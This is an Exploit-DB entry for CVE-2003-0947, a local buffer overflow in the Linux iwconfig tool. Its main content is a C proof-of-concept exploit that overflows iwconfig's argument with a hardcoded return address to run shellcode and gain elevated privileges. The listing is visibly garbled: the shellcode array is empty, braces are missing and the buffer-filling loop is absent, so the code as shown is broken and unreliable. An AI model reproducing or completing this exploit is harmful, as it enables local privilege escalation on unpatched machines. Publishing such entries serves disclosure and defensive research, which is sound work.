IWConfig Local ARGV Command Line Buffer Overflow Vulnerability 3

ID EDB-ID:23301
Type exploitdb
Reporter NrAziz
Modified 2003-10-27T00:00:00


IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (3). CVE-2003-0947. Local exploit for linux platform

A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com

 * Greetz to Mixter,gorny,rave..

 * Description:
 *              iwconfig configures a wireless network interface and is similar to ifconfig
 *  except that iwconfig configures wireless interfaces.
 * Vulnerability:
 *               Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...

 * Yet another Proof Of Concept Xploit for 'iwconfig'

#include <stdio.h>
#include <stdlib.h>

#define BUFF_SIZE 98
#define RET 0xbffffc3f

char shellcode[]=

int main(int argc,char **argv)

  int i;
  char *buff=(char *)malloc(sizeof(char)*BUFF_SIZE);

    *(long *)&buff[i]=RET;



  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);

  return 0;